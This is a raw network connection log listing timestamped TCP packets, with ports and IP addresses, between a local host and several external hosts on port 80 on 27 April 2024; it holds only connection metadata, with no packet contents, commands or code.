Apr 27, 2024 02:19:00.845279932 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.845392942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.845439911 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.845586061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.845630884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.845881939 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.845927000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846005917 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846050024 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846132994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846178055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846299887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846343994 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846512079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846560955 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846671104 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846714020 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846759081 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846806049 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846848965 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846894979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.846911907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.846957922 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.847012043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.847053051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.847057104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.847101927 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:00.847170115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:00.847215891 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014008999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014031887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014049053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014069080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014086962 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014115095 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014270067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014287949 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014303923 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014317036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014321089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014348984 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014370918 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014383078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014401913 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014416933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014430046 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014435053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014445066 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014455080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014475107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014497995 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014616966 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014662027 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014744997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014763117 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014786959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.014820099 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.014868975 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.015162945 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.015239954 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.015286922 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.016496897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.016863108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.016906023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.017072916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.017379045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.017424107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.017563105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.017580986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.017621994 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.018007994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.018104076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.018148899 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.018234015 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.018690109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.018727064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.018733978 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.058917046 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186139107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186197996 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186249018 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186263084 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186283112 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186330080 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186358929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186377048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186393976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186415911 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186419964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186458111 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186521053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186620951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186671972 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186723948 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186742067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186758041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186798096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186815023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186861038 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186888933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186907053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.186955929 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.186965942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.187171936 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.187191010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.187217951 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.188740969 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.188760042 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.189179897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.189213037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.189312935 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.189369917 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.189388037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.189418077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.189996958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.190037966 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.190052032 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.190367937 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.190418005 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.190423965 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.231412888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.231506109 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.231530905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.277671099 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.358221054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358302116 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358320951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358367920 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.358472109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358489990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358520031 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.358572006 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358618021 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.358633995 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358714104 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358755112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.358863115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358880997 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358918905 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.358971119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.358989954 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359039068 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.359075069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359164953 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359208107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.359237909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359314919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359355927 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.359360933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359467030 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359519005 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.359622002 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359697104 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.359745979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.361752987 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.361802101 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.361835003 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.361859083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.362040043 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362087011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.362185955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362205029 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362229109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362248898 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.362584114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362648964 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.362648964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362698078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.362739086 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.402362108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.402467966 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.402530909 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.450320005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.450395107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530293941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530313969 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530330896 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530348063 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530359983 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530371904 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530394077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530395031 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530421019 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530457020 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530626059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530643940 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530661106 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530677080 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530683041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530700922 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530725002 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530740976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530827999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530847073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530874014 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530889034 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.530935049 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530975103 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.530988932 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531018019 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531070948 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.531119108 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531131983 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.531167984 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.531188011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531213999 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531234026 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.531291008 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531410933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.531460047 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.531482935 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.531534910 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.533714056 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.533762932 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.533766985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.533809900 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.533812046 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.533845901 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.533862114 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.533895969 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.534007072 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.534024954 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.534055948 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.534075975 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.534554958 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.534574032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.534607887 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.534631968 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.534652948 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.534686089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.534703016 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.534739971 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.573604107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.573630095 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.573668003 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.573688030 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.622446060 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.622498035 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.622528076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.622575045 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.675240040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.675375938 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.701351881 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.701862097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.701920033 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.701921940 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.701961994 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702013969 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.702164888 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702204943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702250957 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.702269077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702315092 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702361107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702366114 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.702444077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702491999 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.702781916 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702948093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.702997923 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.703027964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.703202963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.703247070 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.704699039 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.704894066 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.704941034 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.704967976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.705075979 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.705130100 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.705868006 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.705929041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.705976009 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.705981016 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.746422052 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.793940067 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.793962955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.794033051 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.851125956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.876770020 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.876818895 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.876853943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.876895905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.876940012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.877005100 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877145052 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877182007 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.877296925 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877398968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877449036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.877494097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877662897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877705097 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.877763987 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877890110 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 02:19:01.877932072 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:01.877963066 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 02:19:02.512064934 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 27, 2024 02:19:02.607021093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:02.616194963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:02.778583050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:02.778672934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:02.778872967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:02.811503887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:02.811578989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:02.811662912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:02.949932098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:03.007014036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007100105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007158041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007203102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.007222891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007268906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007296085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007322073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.007349968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007368088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007395983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.007584095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007626057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.007668972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007703066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.007747889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204054117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204092026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204121113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204140902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204139948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204165936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204174995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204188108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204206944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:03.204210043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:03.204230070 CEST	49734	80	192.168.2.4	176.97.76.106
